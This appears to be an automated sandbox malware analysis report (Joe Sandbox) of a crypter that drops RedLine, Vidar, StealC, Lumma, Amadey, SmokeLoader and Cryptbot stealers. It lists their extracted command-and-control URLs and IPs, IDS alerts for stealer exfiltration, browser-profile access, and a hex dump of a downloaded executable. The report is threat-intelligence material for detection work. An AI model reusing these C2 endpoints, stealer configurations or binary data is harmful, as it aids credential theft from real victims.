                        2024-09-21T13:34:28.472441+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:33.715457+020028033043Unknown Traffic192.168.2.949754162.241.61.218443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:33:41.108483+020028032702Potentially Bad Traffic192.168.2.949710103.130.147.21180TCP
                        2024-09-21T13:33:41.479262+020028032702Potentially Bad Traffic192.168.2.949712176.113.115.3380TCP
                        2024-09-21T13:33:41.490300+020028032702Potentially Bad Traffic192.168.2.949709147.45.44.10480TCP
                        2024-09-21T13:33:41.675629+020028032702Potentially Bad Traffic192.168.2.949708147.45.44.10480TCP
                        2024-09-21T13:33:41.819445+020028032702Potentially Bad Traffic192.168.2.949719176.111.174.10980TCP
                        2024-09-21T13:33:42.362870+020028032702Potentially Bad Traffic192.168.2.949708147.45.44.10480TCP
                        2024-09-21T13:33:42.377935+020028032702Potentially Bad Traffic192.168.2.949727162.241.61.218443TCP
                        2024-09-21T13:33:42.379864+020028032702Potentially Bad Traffic192.168.2.949726162.241.61.218443TCP
                        2024-09-21T13:33:42.662417+020028032702Potentially Bad Traffic192.168.2.949723185.166.143.50443TCP
                        2024-09-21T13:33:43.497247+020028032702Potentially Bad Traffic192.168.2.949730162.241.61.218443TCP
                        2024-09-21T13:33:44.675675+020028032702Potentially Bad Traffic192.168.2.949708147.45.44.10480TCP
                        2024-09-21T13:33:45.044797+020028032702Potentially Bad Traffic192.168.2.949709147.45.44.10480TCP
                        2024-09-21T13:33:45.120822+020028032702Potentially Bad Traffic192.168.2.949708147.45.44.10480TCP
                        2024-09-21T13:33:47.467722+020028032702Potentially Bad Traffic192.168.2.949708147.45.44.10480TCP
                        2024-09-21T13:35:34.885622+020028032702Potentially Bad Traffic192.168.2.949790147.45.44.10480TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
                        Source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                        Source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "d80be45a1eb6454ca916f92c36ebf67d"}
                        Source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.5ca3f2.1.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}
                        Source: 17.2.hd4YBtMwCrxG4M3aLLza89vv.exe.41d5570.0.raw.unpackMalware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["opponnentduei.shop", "carrtychaintnyw.shop", "puredoffustow.shop", "achievenmtynwjq.shop", "chickerkuso.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "milldymarskwom.shop", "sentistivowmi.shop"], "Build id": "a8kafm--@cloudcosmic"}
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe.5828.8.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["/v1/upload.phptventyvf20pt.top", "tventyvf20pt.top", "@tventyvf20pt.top", "analforeverlovyu.top", "entyvf20pt.top"]}
                        Multi AV Scanner detection for domain / URL
                        Source: nerv.com.peVirustotal: Detection: 6%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\EGCBAFCFIJ.exeReversingLabs: Detection: 79%
                        Source: C:\ProgramData\EGCBAFCFIJ.exeVirustotal: Detection: 69%Perma Link
                        Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeReversingLabs: Detection: 54%
                        Source: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeVirustotal: Detection: 64%Perma Link
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeReversingLabs: Detection: 42%
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeVirustotal: Detection: 32%Perma Link
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)ReversingLabs: Detection: 42%
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)Virustotal: Detection: 32%Perma Link
                        Source: C:\Users\userAEBAKJDGHI.exeReversingLabs: Detection: 34%
                        Source: C:\Users\userAEBAKJDGHI.exeVirustotal: Detection: 41%Perma Link
                        Source: C:\Users\userHJDBAFIECG.exeReversingLabs: Detection: 26%
                        Source: C:\Users\userHJDBAFIECG.exeVirustotal: Detection: 39%Perma Link
                        Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeVirustotal: Detection: 32%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeReversingLabs: Detection: 54%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeVirustotal: Detection: 64%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exeVirustotal: Detection: 52%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exeReversingLabs: Detection: 13%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exeVirustotal: Detection: 26%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeReversingLabs: Detection: 71%
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeVirustotal: Detection: 42%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: carrtychaintnyw.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: quotamkdsdqo.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: milldymarskwom.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: metallygaricwo.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: opponnentduei.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: puredoffustow.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: achievenmtynwjq.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: chickerkuso.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: sentistivowmi.shop
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: TeslaBrowser/5.5
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: - Screen Resoluton:
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: - Physical Installed Memory:
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: Workgroup: -
                        Source: 18.3.iXbjjIcri3rG3XH6GK7dHSLO.exe.1addda60000.0.unpackString decryptor: a8kafm--@cloudcosmic
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0051CBD0 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,3_2_0051CBD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0051CE70 SetLastError,GetModuleHandleA,CryptGenRandom,3_2_0051CE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0051CD90 CryptReleaseContext,3_2_0051CD90

                        Bitcoin Miner

                        barindex
                        Yara detected Xmrig cryptocurrency miner
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                        Compliance

                        barindex
                        Detected unpacking (creates a PE file in dynamic memory)
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeUnpacked PE file: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.2270000.2.unpack
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.9:49706 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.9:49723 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.217.131.81:443 -> 192.168.2.9:49728 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.9:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49758 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49761 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49798 version: TLS 1.2
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Users\user\Documents\iofolko5\day2_mixApp.pdbws\ source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.PDB"fal source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2391284217.0000000000525000.00000002.00000001.01000000.0000000B.sdmp, kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2392516588.0000000002420000.00000004.00001000.00020000.00000000.sdmp, kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000000.1788478700.0000000000525000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.00000000047AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2192250317.0000000005FD0000.00000004.08000000.00040000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.00000000047AF000.00000004.00000800.00020000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.0000000004631000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2113363514.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: BotClient.pdb source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: day2_mixApp.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000000.1787917500.00000000001B2000.00000002.00000001.01000000.0000000A.sdmp

                        Spreading

                        barindex
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6388, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00540905 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,3_2_00540905
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\doomed\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\entries\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\Jump to behavior

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.9:49710 -> 103.130.147.211:80
                        Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49742 -> 5.53.124.195:80
                        Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49741 -> 46.8.231.109:80
                        Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49741 -> 46.8.231.109:80
                        Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.9:49741
                        Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49741 -> 46.8.231.109:80
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.9:49741
                        Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49741 -> 46.8.231.109:80
                        Source: Network trafficSuricata IDS: 2056004 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (achievenmtynwjq .shop) : 192.168.2.9:55583 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2056005 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (achievenmtynwjq .shop in TLS SNI) : 192.168.2.9:49764 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2056005 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (achievenmtynwjq .shop in TLS SNI) : 192.168.2.9:49760 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49756 -> 5.53.124.195:80
                        Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49770 -> 45.202.35.101:80
                        Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49749 -> 5.53.124.195:80
                        Source: Network trafficSuricata IDS: 2055834 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop) : 192.168.2.9:58290 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49783 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2056008 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop) : 192.168.2.9:64268 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49787 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2056022 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop) : 192.168.2.9:64873 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49793 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49797 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.9:49794 -> 45.132.206.251:80
                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49763 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49764 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49764 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49766
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49765
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49783 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49783 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49787 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49787 -> 104.21.88.61:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49793 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49793 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49802
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49797 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49797 -> 172.67.204.62:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49804
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6388, type: MEMORYSTR
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://46.8.231.109/c4754d4f680ead72.php
                        Source: Malware configuration extractorURLs: opponnentduei.shop
                        Source: Malware configuration extractorURLs: carrtychaintnyw.shop
                        Source: Malware configuration extractorURLs: puredoffustow.shop
                        Source: Malware configuration extractorURLs: achievenmtynwjq.shop
                        Source: Malware configuration extractorURLs: chickerkuso.shop
                        Source: Malware configuration extractorURLs: metallygaricwo.shop
                        Source: Malware configuration extractorURLs: quotamkdsdqo.shop
                        Source: Malware configuration extractorURLs: milldymarskwom.shop
                        Source: Malware configuration extractorURLs: sentistivowmi.shop
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                        Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                        Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                        Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                        Source: Malware configuration extractorIPs: 45.202.35.101
                        Source: Malware configuration extractorURLs: /v1/upload.phptventyvf20pt.top
                        Source: Malware configuration extractorURLs: tventyvf20pt.top
                        Source: Malware configuration extractorURLs: @tventyvf20pt.top
                        Source: Malware configuration extractorURLs: analforeverlovyu.top
                        Source: Malware configuration extractorURLs: entyvf20pt.top
                        Source: Malware configuration extractorURLs: 193.233.255.84:4284
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Sep 2024 11:33:40 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 20 Sep 2024 19:40:07 GMTETag: "65ba6e-6229234d7ee13"Accept-Ranges: bytesContent-Length: 6666862Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b1 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3e 48 00 00 10 00 00 00 40 48 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 88 18 00 00 00 50 48 00 00 1a 00 00 00 46 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 9b 00 00 00 70 48 00 00 9c 00 00 00 60 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 e0 9d 03 00 00 10 49 00 00 9e 03 00 00 fc 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 b0 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 a0 b3 00 00 02 00 00 00 9a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 b0 b3 00 00 0a 00 00 00 9c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 c0 b3 00 00 02 00 00 00 a6 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 d0 b3 00 00 02 00 00 00 a8 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 68 20 0e 00 00 e0 b3 00 00 22 0e 00 00 aa 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 10 c2 00 00 08 00 00 00 cc 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 20 c2 00 00 a8 01 00 00 d4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 d0 c3 00 00 4e 00 00 00 7c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
